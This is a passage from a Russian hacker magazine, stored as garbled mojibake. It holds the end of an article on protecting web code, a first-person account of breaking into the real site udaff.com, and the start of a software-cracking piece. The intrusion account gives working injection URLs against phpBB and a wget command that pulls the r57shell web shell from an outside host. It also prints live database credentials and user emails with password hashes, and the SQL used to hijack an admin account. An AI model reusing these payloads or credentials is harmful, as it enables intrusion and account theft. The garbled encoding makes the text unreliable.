òðåáóþùèå øèôðîâàíèÿ. Ñêàæåì, çàïèñàë òû â HTML êîíñòðóêöèþ <h1>ß êðóòîé õàêåð</h1> è çàõîòåë, ÷òîáû â èñõîäíèêàõ ñòðàíèöû ýòà íàäïèñü ðèñîâàëàñü ÷èñòûì òåêñòîì. Ñëåäîâàòåëüíî, âî âêëàäêó ñëåäóåò äîáàâèòü äâà òýãà <h1></h1> è ýôôåêò, êàê ãîâîðèòñÿ, áóäåò äîñòèãíóò :). Êñòàòè, ïîëåçíî ïðîïóñêàòü òýãè <title></title>, ÷òîáû ïîèñêîâûå ðîáîòû óñïåøíî èíäåêñèðîâàëè ñòðàíèöó. È åùå îäèí ïðèÿòíûé ìîìåíò.  ïðîãðàììå åñòü âîçìîæíîñòü óñòàíîâèòü ïàðîëü íà çàøèôðîâàííûé ôàéë. Âïîñëåäñòâèè ìîæíî âîññòàíîâèòü èñõîäíûé òåêñò ïî ýòîìó ïàðîëþ, âûáðàâ ñîîòâåòñòâóþùóþ îïöèþ âî âêëàäêå Encrypt Tags. Ïðîãðàììà, åñòåñòâåííî, ïðîñèò äåíåã, îäíàêî ñïàñèòåëüíûå êðýêè ëåæàò íà ñîîòâåòñòâóþùèõ ñàéòàõ è æäóò ìîìåíòà àêòèâàöèè. Íî ÿ òåáå ïðî ýòî íè÷åãî íå ãîâîðèë :) 3 HTML Protector (http://antssoft.fileburst.com/htmlprotector.zip). Êàçàëîñü áû, ïðîãðàììà ïîõîæà íà óæå îïèñàííûå ïðîäóêòû, îäíàêî ÿ ñ÷åë íóæíûì îïèñàòü âîçìîæíîñòè HTML Protector’à. Ïîìèìî âñåãî ïðî÷åãî, ñîôòèíà óìååò çàùèùàòü èçîáðàæåíèÿ. Çäåñü ïðåäëàãàåòñÿ íåñêîëüêî ìåòîäîâ. Ïðîãðàììà ìîæåò ðàçðåçàòü ðèñóíîê íà íåñêîëüêî ÷àñòåé, òåì ñàìûì ïðåäîòâðàùàÿ åãî ñêà÷èâàíèå. Òàê æå ìîæíî ñêîíâåðòèðîâàòü êàðòèíêó â òèï swf, ÷òî âûçîâåò íåêîòîðûé ñòóïîð ó ïîñåòèòåëÿ (íî íàâåðíÿêà òîëüêî ó íîâè÷êîâ). È ñàìûé èçëþáëåííûé ìåòîä çàùèòû — äî-

058

Íà êîìïàêòå òû íàéäåøü âñå ïðîäóêòû, îïèñàííûå â ýòîé ñòàòüå, à òàêæå áîíóñ â âèäå òðåõ ïðîãðàìì, çàùèùàþùèõ HTML è ASP-êîíòåíò.

Ðåêîìåíäóþ ïî÷èòàòü íåñêîëüêî ìåòîäîâ çàùèòû êîäà íà ñòðàíèöå: www.kavkazchat.com/archive/index.php/t-16344.html. Çäåñü îñíîâíîå âíèìàíèå àêöåíòèðóåòñÿ íà çàùèòå èçîáðàæåíèé, ïîýòîìó áóäåò íåâðåäíî îçíàêîìèòüñÿ ñî ñòàòüåé.

áàâëåíèå âîäÿíîãî çíàêà è òðåéäìàðêà íà èçîáðàæåíèå ñ çàäàííîé ïðîçðà÷íîñòüþ. Ïîìèìî âñåãî ïðî÷åãî, Protector ìîæåò íàëîæèòü ïîñòîðîííèé ðèñóíîê íà âñå èçîáðàæåíèÿ. Ïîäîáíûé øåäåâð âðÿä ëè áóäóò èñïîëüçîâàòü íà äðóãèõ èñòî÷íèêàõ. Åñòåñòâåííî, âî âêëàäêå Input òðåáóåòñÿ çàãðóçèòü âåñü WWW-ñàéò, âêëþ÷àÿ ðèñóíêè. ÑËÎÂÎ Î ÑÊÐÈÏÒÀÕ Âîò òû è íàó÷èëñÿ çàùèùàòü ñâîè web-ïðîåêòû, e-mail àäðåñà è èçîáðàæåíèÿ. Îäíàêî ñóùåñòâóåò åùå îäíà îïàñíîñòü — êðàæà ñêðèïòîâ. Ïðåäñòàâü, ÷òî ó òåáÿ åñòü âèðòóàëüíûé ñåðâàê, ãäå òû ïîêàçûâàåøü ìèðó ñâîé íîâûé PHP-äâèæîê, êîòîðûé äâà ãîäà ïèñàë ñ íàïàðíèêîì è â êîòîðîì ðåàëèçîâàë êó÷ó íàâîðîòîâ è ñëîæíûõ ôèøåê. Ñàìî ñîáîé, òû âñåðüåç îïàñàåøüñÿ, ÷òî êàêîé-íèáóäü õàêåðîáäîëáûø ïðîñòî ïîëîìàåò òâîé ñåðâàíò è óïðåò äîðîãèå ñîðöû. Ñïåöèàëüíî äëÿ òåáÿ ïðîãðàììèñòû Zend, êîòîðûå, êðîìå âñåãî ïðî÷åãî, çàíèìàþòñÿ ðàçðàáîòêîé ÿäðà PHP, ñîçäàëè ñèñòåìó Zend Encoder, êîòîðàÿ ìîæåò èçãîòîâèòü èç ëþáîãî php-ñêðèïòà áèíàðíûé ôàéë, âûïîëíåííûé ïðè ïîìîùè Zend Optimizer. Ýòà ñâÿçêà óæå äàâíûì-äàâíî ñòàëà ñòàíäàðòîì äëÿ êîììåð÷åñêèõ ïðèëîæåíèé è àêòèâíî èñïîëüçóåòñÿ. Ïðè ýòîì ñèñòåìà äîñòàòî÷íî íàäåæíà, ñòàáèëüíà, è åé äîâåðÿþò ñàìûå äîðîãèå ñêðèïòû è ïðîãðàììû. Åäèíñòâåííûé ìèíóñ — èñïîëüçîâàíèå ñèñòåìû ñòîèò äåíåã. Ïîýòîìó äëÿ íàñ ñ òîáîé îíà íå ñëèøêîì ïîäõîäèò. Ìû âîñïîëüçóåìñÿ äðóãèì çäîðîâûì ðåøåíèåì — ñîôòèíîé php_screw. Php_screw áåç ïðîáëåì ñêðó÷èâàåòñÿ php_mod’îì è ïðåêðàñíî øèôðóåò ëþáûå ñöåíàðèè. Apache áåç òðóäà ðàñïîçíàåò íåïîíÿòíûå èñõîäíèêè, è äàæå åñëè âçëîìùèê ñòàùèò ó òåáÿ ñòðóêòóðó äâèæêà, òî âîññòàíîâèòü åìó èñõîäíûé êîä áóäåò î÷åíü ñëîæíî. Äàâàé ïîòðåíèðóåìñÿ è ïîñòàâèì ñîôòèíêó íà ñåðâåð.  ïåðâóþ î÷åðåäü ñêà÷èâàåì php_screw (http://prdownloads.sourceforge.net/ php-screw/php_screw-1.3.tgz) è êîíôèãóðèì ïðîãðàììó. Çàòåì ñëåãêà èçìåíèì äëèíû êëþ÷åé êîäèðîâàíèÿ â ôàéëå php_screw.h. Ïðîñòî ïîìåíÿé 5 ÷èñåë íà ëþáûå çíà÷åíèÿ, ÷òîáû òâîè êëþ÷è íå áûëè äåôîëòíûìè. Ïîñëå ýòîãî ìîæíî ñîáèðàòü ïðîãó êîìàíäîé make. Òåïåðü íà÷èíàåòñÿ ñàìîå èíòåðåñíîå. Ñêîïèðóé ãîòîâûé ìîäóëü php_screw.so â êàòàëîã, ãäå íàõîäèòñÿ php (ó ìåíÿ ýòî /usr/lib/php4). Ïîñëå ýòîãî äîáàâü ñòðî÷êó «extension=php_screw.so» â ôàéë php.ini (îí íàõîäèòñÿ òàì æå). È íàïîñëåäîê ïåðåçàïóñòè Apache. Ñ ýòîé ìèíóòû web-ñåðâåð ìîæåò ïîíèìàòü çàøèôðîâàííûé ïðîãðàììîé php-êîä. Îñòàëîñü òîëüêî ñãåíåðèðîâàòü ïàðî÷êó ñëîæíûõ ñöåíàðèåâ :). Ýòî äåëàåòñÿ êîìàíäîé «screw /ïóòü/ê/êàòàëîãó/ñêðèïòîâ». Íî ïîìíè, ÷òî áèíàðíèê screw íóæíî ïðåäâàðèòåëüíî ñîáðàòü çàïðîñîì make â äèðåêòîðèè tools. Âñå çàêîäèðîâàííûå ñêðèïòû áóäóò ñîçäàíû â ýòîì æå êàòàëîãå, à îðèãèíàëû çàïèøóòñÿ ïîä èìåíåì script.php.screw. ß ïðîâåðèë ýòó øòóêó íà ñâîåì ñåðâåðå, è îíà ìíå î÷åíü ïîíðàâèëàñü. Ïðàâäà, ó ìåíÿ ïîêà íåò íåîáõîäèìîñòè øèôðîâàòüñÿ, òàê êàê íà ìîåì ñàéòå ÿ íå äåðæó íè÷åãî êðîìå ïóáëè÷íîãî ôîðóìà vBuletin. Íî ÿ óâåðåí, ÷òî ó òåáÿ åñòü ïðîåêòû ïîêðó÷å áîðäû :). ÇÀÙÈÒÈ ÑÅÁß ÑÀÌ! Âîò è âñÿ ïèùà ê ðàçìûøëåíèþ. Òû ìîæåøü ïðÿìî ñåé÷àñ ñêà÷àòü ñîôò è ïîëíîñòüþ çàùèòèòü ñâîé ñàéò, à òàêæå âñå php-ñöåíàðèè. Îäíàêî ëó÷øå íå òîðîïèòüñÿ è ïîäóìàòü î ïðîäóêòèâíîñòè çàùèòû. Ñ îäíîé ñòîðîíû, íèêòî íå ñïèîíåðèò ó òåáÿ òâîþ «ñîáñòâåííîñòü», à ñ äðóãîé — ñîâñåì íåîáÿçàòåëüíî øèôðîâàòü âåñü êîä, âåäü ýòî ïðèâåäåò ê óâåëè÷åíèþ ðàçìåðà ñòðàíèö â 7—10 ðàç. Ðàçóìíåå áóäåò çàùèòèòü îòäåëüíûå ó÷àñòêè êîäà è âàæíûå èçîáðàæåíèÿ, êîòîðûå ìîãóò áûòü èíòåðåñíû äðóãèì, ìåíåå óäà÷ëèâûì web-äèçàéíåðàì. BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 06


ÂÇËÎÌ

ÑÅÉ×ÀÑ ÂÛÐÎÑËÎ ÖÅËÎÅ ÏÎÊÎËÅÍÈÅ ÈÍÒÅÐÍÅÒ-ÁÀÊËÀÍÎÂ, ÒÓÑÓÞÙÈÕÑß ÍÀ UDAFF.COM, ÏÎËÎÂÈÍÀ ÈÇ ÊÎÒÎÐÛÕ — ÏÅÐÂÛÅÍÀÕ, À ÄÐÓÃÈÅ ÆÆÓÒ È ÏÈÑØÓÒ ÅÑ×Å. ÐÅÁßÒ ÒÀÊÈÕ ÐÅÀËÜÍÎ ÌÍÎÃÎ. ÍÅÄÀÂÍÎ ÂÎÒ ÍÀÌ ÍÀÏÈÑÀË ×ÓÂÀÊ, ÊÎÒÎÐÛÉ ÄÎËÃÎ È ÓÏÎÐÍÎ ÑËÀË ÐÅÄÀÊÒÎÐÀÌ UDAFF.COM ÑÂÎÈ ÊÐÅÀÒÈÂÛ, ÍÎ ÝÒÈ ÑÂÎËÎ×È ÂÇßËÈ È ÇÀÈÃÍÎÐÈËÈ ÏÀÐÍß. ÒÎÃÄÀ ÍÀØ ÃÅÐÎÉ ÍÅ ÎÁËÎÌÀËÑß: ÎÍ Î×ÅÍÜ ÎÁÈÄÅËÑß È ÐÅØÈË ÏÎËÎÌÀÒÜ ÑÀÉÒ ÓÄÀÂÀ.


TEXT MAG / MAG@WAPP.RU /

ÒÓÏÛÅ ÁÀÃÈ È ÈÑÒÎÐÈß ÂÇËÎÌÀ UDAFF.COM

ÎÒ ÏÅÐÂÎÃÎ ËÈÖÀ Ïðè ïåðâîì âçãëÿäå íà ôîðìàò ññûëîê íà ñàéòå (íàïðèìåð, http://udaff.com/creo/51377.html) ñòàëî ïîíÿòíî, ÷òî äâèæîê èñïîëüçóåò mod_rewrite web-ñåðâåðà Apache. Äåéñòâèòåëüíî, ãëóïî áûëî ïðåäïîëàãàòü, ÷òî íà ñåðâåðå â ïàïêàõ õðàíèòñÿ êó÷à html-ôàéëîâ :). Ýòî íå åñòü ãóä, íåëüçÿ â ïàðàìåòðû, ïåðåäàâàåìûå ñêðèïòó, ñòàâèòü êàâû÷êó è ïðî÷èå íåõîðîøèå ñèìâîëû. Òîãäà ÿ ñòàë èçó÷àòü àëüòåðíàòèâíûå ïðîåêòû Óäàâà, ññûëêè íà êîòîðûå ïðèñóòñòâóþò íà ãëàâíîé ñòðàíèöå. Ïåðâûì äåëîì ÿ ïîïàë íà http://news.udaff.com. Çäåñü óæå íå èñïîëüçîâàëñÿ ìîä_ðåðàéò. Ýòî óæå ëó÷øå. Ìîæíî ïîèãðàòü ñ ïàðàìåòðàìè. ß ïåðåøåë ïî ññûëêå íà íîâîñòü http://news.udaff.com/ index.php?cat=vov2&news=1, ïîäñòàâèâ â ïàðàìåòð news=1' êàâû÷êó. Ñèñòåìà âûäàëà ìíå îøèáêó:

Warning: fopen(news/vov2/1'): failed to open stream: No such file or directory in /home/udaff.com/news/news.udaff.com/news.php on line 3 Íå ìîãó îòêðûòü ôàéë. ÏÀÄÎÍÊÈ ÆÆÓÒ Âàó! Ýòà îøèáêà äîëæíà ïîçâîëèòü íàì ïðî÷èòàòü ëþáûå ôàéëû íà ñèñòåìå! ×òî ÿ è ñäåëàë, ïåðåéäÿ ïî òàêîé ññûëêå: http://news.udaff.com/index.php?cat=..&news=index.php Çäåñü cat-êàòàëîã, news-ôàéë. Íà ýòó ññûëêó ñêðèïò âûïëþíóë ìíå ñòðàíèöó, ãäå èìåëîñü ñëåäóþùåå:

$catnames = array ("incidents" => "Ïðîèøýñòâèÿ", "politic" => "Ïîëèòåêà", "economic" => "Èêàíîìåêà", "obscestvo" => "Îáñ÷åñòâî", "tech" => "Íîóêà è òåõíèêà", "medic" => "Ìåäåöûíà", "sport" => "Ñïîðò", "nature" => "Ïðåðîäà", "reports" => "Ðèïàðòàæû", "vov2" => "ÂΠ2", "sluzhebnaya" => "Ñëóæåáíàÿ"); :: è øòóê 15 òàêèõ îøèáîê:

Warning: stristr(): Empty delimiter. in /home/udaff.com/news/news.udaff.com/news.php on line 152

XÀÊÅÐ 01 /85/ 06

Òî åñòü ñêðèïò ÷èòàë ïî÷åìó-òî òîëüêî ïåðâûå n-ñèìâîëû èç ôàéëà. Ïîýêñïåðèìåíòèðîâàâ åùå c íåñêîëüêèìè ôàéëàìè, ÿ ïîíÿë, ÷òî òóò äåëàòü íå÷åãî. Òîãäà ÿ ïîøåë äàëüøå. Ñëåäóþùèì îáúåêòîì äëÿ èçó÷åíèÿ ñòàë http://flash.udaff.com. Çäåñü ìîæíî ñêà÷àòü ïàäîíà÷üè ôëåøêè ñî ñòðàíèöû http://flash.udaff.com/ indaflashki.php. È âîò ÷òî ìû ïîëó÷èì, ïîäñòàâèâ â ïàðàìåòð id êàâû÷êó:

Warning: main(header'.inc): failed to open stream: No such file or directory in /home/udaff.com/flash/html/flashka.php on line 96 Warning: main(): Failed opening 'header'.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/udaff.com/flash/html/flashka.php on line 96 Òóò ìîæíî ïîèãðàòü ñ èíêëóäîì, âñòàâèâ â êîíöå ññûëêè ñèìâîë êîíöà ñòðîêè %00, íàïðèìåð, ïåðåéäÿ íà http://flash.udaff.com/ flashka.php?id=./flashka.php%00, ìû ïîëó÷èì òàêóþ îøèáêó: Warning: main(header./flashka.php): failed to open stream: No such file or directory in /home/udaff.com/flash/html/flashka.php on line 96 Îïÿòü íàì ýòî íè÷åãî îñîáîãî íå äàñò. ß ïûòàëñÿ, íî íè÷åãî õîðîøåãî çàèíêëóäèòü íå óäàëîñü. Òóò ÿ óæå íà÷àë çëèòüñÿ è çàðÿäèë â ãóãë ñëåäóþùèé çàïðîñ äëÿ ïîèñêà:

inurl:"udaff.com" filetype:php ÌÎÐÎÇÍÎÅ ÑÎËÍÖÅ Ëþáèìûé ïîèñêîâèê âûäàë çäîðîâóþ êó÷ó ëèíêîâ. Ïîáðîäèâ ïî íèì, ÿ íàòêíóëñÿ íà îäèí èíòåðåñíûé ñàéò: http://sunfreez.udaff.com (http://pesdec.com). À èíòåðåñåí îí áûë òåì, ÷òî íà íåì óñòàíîâëåíà íþêà ñî ñòàðîé (2.0.8) âåðñèåé ïîïóëÿðíîãî ôîðóìà phpBB. Âñå, íàâåðíî, çíàþò çíàìåíèòóþ äûðêó ñ highlight-ïàðàìåòðîì âî âñåõ âåðñèÿõ ýòîãî ôîðóìà äî 2.0.10 âêëþ÷èòåëüíî, êîòîðóþ ÿ íåçàìåäëèòåëüíî è íà÷àë èñïîëüçîâàòü :). Ïåðâûì äåëîì ÿ âûÿñíèë,

061


ÂÇËÎÌ ///// ISSUE

ïåðâûé áàã íà news.udaff.com îêàçàëñÿ íå ñàìûì îïàñíûì

ñïèñîê äèðåêòîðèé, îòêðûòûõ äëÿ çàïèñè

èñïîëüçóåì web-øåëë äëÿ èçó÷åíèÿ âíóòðåííîñòåé ñåðâåðà

âîò îíè, ïàðîëè ê áàçå äàííûõ!

ñïèñîê áàç äàííûõ íà ñåðâåðå. Èõ äîôèãà

âíóòðè ��äìèíêè udaff.com

åñòü ëè íà ñåðâàêå wget, çàïðîñèâ ñëåäóþùèé àäðåñ:

phpPgAdmin, êîòîðûé íàõîäèëñÿ ïî àäðåñó:

http://sunfreez.udaff.com/modules.php?name=Forums&file=view topic&t=108&highlight=%2527.$poster=`$hera`.%2527&hera=w hich%20wget

/home/sites/pesdec.com/html/gallery/albums/userpics/users/conf /config.inc.php ß èçìåíèë òîëüêî ñëåäóþùèå ïàðàìåòðû:

Wget íà ñåðâåðå áûë (/usr/bin/wget), íî òåïåðü íóæíà áûëà äèðåêòîðèÿ, îòêðûòàÿ äëÿ çàïèñè, êóäà ìîæíî áûëî áû çàëèòü áîëåå óäîáíûé web-øåëë. Äëÿ ïîèñêà òàêîâîé ÿ âîñïîëüçîâàëñÿ óòèëèòîé find:

http://sunfreez.udaff.com/modules.php?name=Forums&file=view topic&t=108&highlight=%2527.$poster=`$hera`.%2527&hera=fi nd ./ type d -perm 0777 -ls Òàêèõ äèðåêòîðèé îêàçàëîñü òðè: gallery/albums, gallery/albums/edit è gallery/albums/userpics. Îñòàâàëîñü òîëüêî çàëèòü óäîáíûé âåáøåëë, ÷òî ÿ è ñäåëàë, â êà÷åñòâå ãîòîâîãî ðåøåíèÿ èñïîëüçîâàâ õâàëåíûé r57shell. Âûïîëíèâ êîìàíäó

http://sunfreez.udaff.com/modules.php?name=Forums&file=view topic&t=108&highlight=%2527.$poster=%60$hera%60.%2527& hera=wget%20O%20./gallery/albums/userpics/userfiles.php%20http://rst.void.r u/download/r57shell.txt,

Òåïåðü ìîæíî áûëî çàëîãèíèâàòüñÿ íà íàø pg-ñåðâàê ñ ïîëó÷åííûìè ðàíåå ëîãèíîì è ïàðîëåì, ÷òî ÿ òóò æå è ïðîäåëàë. Ñêðèïò âûäàë ìíå êó÷ó áàç äàííûõ, íî ìíå íóæíà áûëà òîëüêî îäíà — udaff :). Òàê êàê phpPgAdmin íå ïîçâîëÿåò ïðÿìî â áðàóçåðå ïðîñìàòðèâàòü ñòðóêòóðó áàç äàííûõ, òî ÿ íà÷àë ñëèâàòü äàìï ýòîé áàçû. Äîéäÿ äî ìåñòà, ãäå áûëè ñòðîêè:

INSERT INTO ra_users VALUES (1, 'proforg', '3226139f7e09e6c29f9fc9520acf209b', 'proforg@maloletka.ru', 'proforg', ''); INSERT INTO ra_users VALUES (2, 'vaikon', '3226139f7e09e6c29f9fc9520acf209b', 'vaikon@idbh.ru', 'vaikon', '');

ÿ ïîëó÷èë ïîëíîöåííûé web-øåëë ïî àäðåñó: http://sunfreez.udaff.com/gallery/albums/userpics/userfiles.php. Ïîñìîòðåâ íà èñïîëüçóåìóþ ñèñòåìó è äåìîíû, ÿ ïîíÿë, ÷òî ïðîýêñïëîéòèòü ñèñòåìó âðÿä ëè óäàñòñÿ, òàê êàê ÿ åùå íå âèäåë ïóáëè÷íûõ ñïëîèòîâ ïîä óñòàíîâëåííûå ñåðâèñû, äà Linux 2.6.13.3 íà òîò ìîìåíò äàæå ëîêàëüíî íå ïðîáèâàëñÿ. Ïîýòîìó ÿ ïîñòàâèë ñåáå îñíîâíîé çàäà÷åé ïðîíèêíîâåíèå â àäìèíêó Óäàâà. ×åì è çàíÿëñÿ äàëüøå.

ÿ îñòàíîâèëñÿ, òàê êàê âèäåë çàïðîñû ê ýòîé òàáëèöå â ôàéëå, êîòîðûé îòâå÷àë çà àâòîðèçàöèþ â àäìèíêå :). Íîâîãî ïîëüçîâàòåëÿ â àäìèíêó ÿ äîáàâëÿòü íå ñòàë, à âñåãî ëèøü ñîîðóäèë íåáîëüøîé ñêðèïò ñî ñëåäóþùèì ñîäåðæàíèåì:

ÑÀÌ ÑÅÁÅ ÏÐÎÔÎÐà Ñíà÷àëà ïóòåì íåõèòðûõ ëîãè÷åñêèõ ðàññóæäåíèé ÿ âû÷èñëèë äèðåêòîðèþ, ãäå íàõîäèëñÿ îñíîâíîé ñàéò (/home/www/udaff.com/), äàëåå, ïðîñìîòðåâ ëèñòèíã ôàéëîâ è êàòàëîãîâ, ìîæíî ïîíÿòü, ÷òî àäìèíêà íàõîäèòñÿ â adm/, à ïàðàìåòðû ïîäêëþ÷åíèÿ ê áàçå äàííûõ, êîòîðûå íàì è íàäî óçíàòü, — â ôàéëèêå kernel.ini.php. Îòêðûâ åãî, ÿ óâèäåë ñëåäóþùåå:

Ñöåíàðèé, óñïåøíî âûïîëíèâøèñü, âûäàë ìíå md5-õýø ñòðîêè 12345. Äàëåå ïîñëåäîâàë ñëåäóþùèé çàïðîñ ê áàçå äàííûõ:

[db] type user password port host db

= "pgsql"; = "proforg"; = "FogOnjuhayg8"; = 5433; = "psql"; = "udaff";

Õå-õå, çäåñü èñïîëüçóåòñÿ ïîñòãðåñ, à ó ìåíÿ íà íîóòå êàê ðàç âàëÿëñÿ phpPgAdmin, êîòîðûé ÿ è çàëèë â óæå èçâåñòíóþ ïàïêó, äîñòóïíóþ äëÿ çàïèñè. Ïåðåéäÿ ïî ññûëêå http://sunfreez.udaff.com/gallery/albums/userpics/users, ÿ óâèäåë ôîðìó äëÿ ëîãèíà. Íî, ÷òîáû âñå çàðàáîòàëî, ñíà÷àëà íàäî áûëî íàñòðîèòü êîíôèãóðàöèîííûé ôàéë

062

$conf['servers'][0]['desc'] = 'psql'; $conf['servers'][0]['host'] = 'psql'; $conf['servers'][0]['defaultdb'] = 'udaff';

<? print md5('12345'); ?>

UPDATE ra_users SET passwd='827ccb0eea8a706c4c34a16891f84e7b' WHERE login='proforg' Ýòèì çàïðîñîì ìû óñòàíîâèëè ïàðîëü 12345 àäìèíó proforg :). Äóìàþ, òåïåðü ìîæíî íàâåäàòüñÿ â àäìèíêó ïî àäðåñó: http://udaff.com/adm. Ïîñëå óñïåøíîãî âõîäà â àäìèíêó ñ ëîãèíîì proforg è ïàðîëåì 12345, ÿ, ÷òîáû íå ïàëèòüñÿ, âåðíóë ïðîôîðãó ñòàðûé ïàðîëü çàïðîñîì:

UPDATE ra_users SET passwd='3226139f7e09e6c29f9fc9520acf209b' WHERE login='proforg' ÀÄÌÈÍÈÌ ÓÄÀÔÔ Ïîñêîëüêó ó ìåíÿ óæå áûëè àäìèíñêèå êóêè, ÿ ïðèíÿëñÿ àêòèâíî èçó÷àòü àäìèíñêèé èíòåðôåéñ. Íàäî çàìåòèòü, ÷òî êóêè íà Óäàâå íå ïðèâÿçûâàþòñÿ ê êîíêðåòíîìó àéïèøíèêó, òî åñòü ìîæíî ñïîêîéíî ñèäåòü ïîä àäìèíîì, è íèêòî íè÷åãî íå çàìåòèò. Íà ýòîì ÿ XÀÊÅÐ 01 /85/ 06


ÂÅÕÈ ÓÑÏÅÕÀ ÎÒÄÅËÀ «Ê»


ÂÇËÎÌ ÂÇËÎÌ ///// ISSUE

TEXT ARA / ARA@CRACKLAB.RU /

ÍÅÂÈÄÈÌÀß ÂÎÉÍÀ

ÑÏÀÑÓÒ ËÈ ÊÐÈÏÒÎÀËÃÎÐÈÒÌÛ ÏÐÎÃÐÀÌÌÛ ÎÒ ÂÇËÎÌÀ?

ÍÅ ÑÅÊÐÅÒ, ×ÒÎ ÏÐÎÈÇÂÎÄÈÒÅËÈ ÏÐÎÃÐÀÌÌÍÎÃÎ ÎÁÅÑÏÅ×ÅÍÈß ÂÎ ÂÑÅÌ ÌÈÐÅ ÑÒÐÅÌßÒÑß ÌÀÊÑÈÌÀËÜÍÎ ÍÀÄÅÆÍÎ ÇÀÙÈÒÈÒÜ ÑÂÎÞ ÏÐÎÄÓÊÖÈÞ ÎÒ ÐÀÇËÈ×ÍÛÕ ÂÈÄΠÂÇËÎÌÀ.  ÍÀÑÒÎßÙÅÅ ÂÐÅÌß ÎÃÐÎÌÍÓÞ ÏÎÏÓËßÐÍÎÑÒÜ ÏÐÈÎÁÐÅËÈ ÍÀÂÅÑÍÛÅ ÇÀÙÈÒÛ Â ÂÈÄÅ ÐÀÇËÈ×ÍÛÕ ÏÐÎÒÅÊÒÎÐÎÂ. ÏÐÈÍÖÈÏÛ ÈÕ ÐÀÁÎÒÛ ÈÇÓ×ÅÍÛ ÂÄÎËÜ È ÏÎÏÅÐÅÊ ÅÙÅ Ñ ÌÎÌÅÍÒÀ ÂÎÇÍÈÊÍÎÂÅÍÈß, È Ñ ÂÛÕÎÄÎÌ ÊÀÆÄÎÉ ÍÎÂÎÉ ÂÅÐÑÈÈ ÌÎÌÅÍÒÀËÜÍÎ ÏÎßÂËßÞÒÑß ÌÀÍÓÀËÛ ÏÎ ÈÕ ÂÇËÎÌÓ. ÊÎÌÌÅÐ×ÅÑÊÈÅ ÏÐÎÒÅÊÒÎÐÛ ÑÒÎßÒ ÄÎÂÎËÜÍÎ ÌÍÎÃÎ È ÈÇ-ÇÀ ÝÒÎÃÎ ÍÅÄÎÑÒÓÏÍÛ ÏÐÎÃÐÀÌÌÈÑÒÓ-ÎÄÈÍÎ×ÊÅ. ÏÎÝÒÎÌÓ ÅÌÓ ÏÐÈÕÎÄÈÒÑß, ÊÐÎÌÅ ÐÀÇÐÀÁÎÒÊÈ ÑÎÁÑÒÂÅÍÍÎ ÏÐÎÄÓÊÒÀ, ÇÀÍÈÌÀÒÜÑß È ÅÃÎ ÇÀÙÈÒÎÉ. ÍÎ ÄËß ÑÎÇÄÀÍÈß ÊÀ×ÅÑÒÂÅÍÍÎÉ ÇÀÙÈÒÛ ÍÅÎÁÕÎÄÈÌÎ ÈÌÅÒÜ ÕÎÒß ÁÛ ÁÀÇÎÂÎÅ ÏÐÅÄÑÒÀÂËÅÍÈÅ Î ÌÅÒÎÄÀÕ ÂÇËÎÌÀ ÏÐÎÃÐÀÌÌ, ÈÍÑÒÐÓÌÅÍÒÀÕ, ÑÏÎÑÎÁÀÕ ÏÐÎÒÈÂÎÄÅÉÑÒÂÈß, ÎÒËÀÄÊÅ È ÒÀÊ ÄÀËÅÅ.  ÝÒÎÉ ÑÒÀÒÜÅ ÌÍÅ ÕÎÒÅËÎÑÜ ÁÛ ÐÀÑÑÌÎÒÐÅÒÜ ÍÀ ÏÐÈÌÅÐÅ ÎÄÍÎÉ ÏÐÎÃÐÀÌÌÛ ÒÈÏÈ×ÍÛÅ ÎØÈÁÊÈ ÁÎËÜØÈÍÑÒÂÀ ÏÐÎÃÐÀÌÌÈÑÒΠÏÐÈ ÐÀÇÐÀÁÎÒÊÅ ÇÀÙÈÒÛ ÑÂÎÈÕ ÏÐÎÄÓÊÒΠÍÀÄÅÆÍÛ ËÈ ÄÅÌÎÂÅÐÑÈÈ? Èññëåäîâàòü ìû áóäåì ïðîãðàììó Àíäðåÿ Êîíîíîâà Circuit Magic — êîìïëåêñ äëÿ ðàñ÷åòà ýëåêòðè÷åñêèõ öåïåé ïîñòîÿííîãî è ïåðåìåííîãî òîêà â îáùåì âèäå. Èìåííî åå ïîïðîñèëè âçëîìàòü íà îäíîì èç ôîðóìîâ, ïîñâÿùåííûõ âçëîìó è çàùèòå ïðîãðàìì — CrackL@b. Ïî ðàáîòå ïðîãðàììû íè÷åãî ñêàçàòü áûëî íåëüçÿ: ïðè êëèêå íà ëþáóþ èêîíêó âûñêàêèâàëî íàçîéëèâîå ñîîáùåíèå, ÷òî â äåìîâåðñèè ýòà îïöèÿ íåäîñòóïíà. Íà ïåðâûé âçãëÿä — ñòàíäàðòíàÿ äåìîíñòðàöèîííàÿ âåðñèÿ, îñíîâíûå ôóíêöèè çàáëîêèðîâàíû. Íî â ìåíþ ïðèñóòñòâóåò ïóíêò «Ðåãèñòðàöèÿ», ïðè ïîïûòêå âûçâàòü êîòîðóþ ïðîãðàììà ïðîñòî çàêðûâàåòñÿ. Âîçìîæíî, àâòîð ïðîñòî çàáûë åãî óäàëèòü, à ìîæåò, îñòàâèë íàìåðåííî, ïûòàÿñü çàïóòàòü ïîòåíöèàëüíîãî âçëîìùèêà. Íàì îñòàåòñÿ òîëüêî ãàäàòü. Ïîäóìàåì, êàê æå ñîçäàþò äåìîâåðñèè? Åñëè ðàññóäèòü ëîãè÷åñêè, òî â áîëüøèíñòâå ñëó÷àåâ äåìîâåðñèÿ åñòü íè ÷òî èíîå, êàê ïîëíàÿ âåðñèÿ, òîëüêî ñàìûå îñíîâíûå îïöèè èç ïðîãðàììû óäàëÿþòñÿ è çàìåíÿþòñÿ íà ðàçëè÷íûå íàïîìèíàíèÿ î ðåãèñòðàöèè. Ýòî â èäåàëå (äëÿ ðàçðàáîò÷èêà). Íà ïðàêòèêå ïîïàäàþòñÿ è òàêèå «øåäåâðû», â êîòîðûõ âñå íóæíîå îñòàåòñÿ íà ìåñòå, à íàïîìèíàíèÿ ïðîñòî äîáàâëÿþòñÿ ê îñíîâíîé ïðîãðàììå â îáõîä âûçîâîâ íóæíûõ ïðîöåäóð. Áåçóñëîâíî, âçëîìùèêó íå ñîñòàâèò îñîáîãî òðóäà ýòî îáíàðóæèòü è ïóòåì ïîäìåíû (ïàò÷à) íåñêîëüêèõ áàéò ëåãêèì äâèæåíèåì ðóêè ïðåâðàòèòü äåìêó â ïîëíîôóíêöèîíàëüíûé ïðîäóêò. Íî ñ ýòîé ïðîãðàììîé òàêîé ôîêóñ íå ïðîøåë — íàñòîÿùàÿ äåìî, ôóíêöèè âûðåçàíû, òàê ÷òî ïðàêòè÷åñêîãî èíòåðåñà íå ïðåäñòàâëÿåò. ×òî æ, áóäåì ïûòàòüñÿ äîñòàòü 